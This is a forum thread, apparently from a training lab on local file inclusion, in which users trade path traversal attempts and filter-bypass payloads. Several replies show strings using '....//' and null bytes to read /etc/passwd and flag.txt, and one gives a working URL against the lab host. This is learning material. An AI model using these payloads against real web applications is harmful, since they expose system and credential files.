FILE INCLUSION - Basic Bypasses Question

Hello there,

I tryed all of below both URL encoded and clear.
What i do wrong ?

languages/es.php

./languages/…/…/…/…/…/es.php

…//languages/es.php

…//languages/…/…/…/…/etc/passwd

RandomAndNonRandomName/…/…/…/etc/passwd/././././././././././.(2048 thing. Goes and goes.)

./languages/…/…/…/…/…/flag.txt%00

…//languages/…/…/…/…/…/flag.txt

languages/…/…/…/…/…/flag.txt%00

./languages/…/…/…/…/…/flag.txt%00

languages/…/…/…/…/…/flag.txt

.\languages..........\flag.txt%00

languages/…/…/…/…/…/flag.txt%00

./languages/etc/passwd%00

There are three dots ... between the slashes, but Unix use two dots as parent directory name ..

There was two before i post.
It changed to three after i posted

@xtal have any idea ?.

Sorry. No specific idea.

The three points were an obvious error. But it was just an error in presentation, not the real error.

I would start with ./../etc/passwd and then insert more /../ until I can access the passwd file. You know absolute path and filename of the passwd file so I would try to access this file first. If you are on a unix machine there will be the file /etc/passwd.

Well… Still could’t resolve it.

Hey,
Did you slved?
I have 3 days trying…

I did everything in the training page but couldnt solve…

Does anybody have a solution to this?
I went through the cheat sheet, encoded, than double encoded all of the examples still unable to open the passwd file not to mention the actual task.

When you guys first visit a page the parameter includes ‘languages/page/’. What if the code checks if parameter contains ‘languages’? :thinking:

If you want PM me, I can provide automatic tool that solves lfi automatically.

This one works.

http://206.189.124.56:32620/index.php?language=languages///....//....//....//....//....//....//.....//....//....//....//etc/passwd

1 Like

Thank you, it works indeed!

1 Like
languages///....//....//....//.....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd

One way I found out was to try and get back to the original file to make sure I had the encoding correct for example:

languages/....//languages/en.php

Should take you back to the en.php page.
From there, I changed en.php to flag.txt

languages/....//flag.txt

Then it’s just a guessing game on how many ....// you need to add.
Unless there is a specific way to find out how many …// ?
I was confused though because I thought the flag file was in the languages directory since it said /flag.txt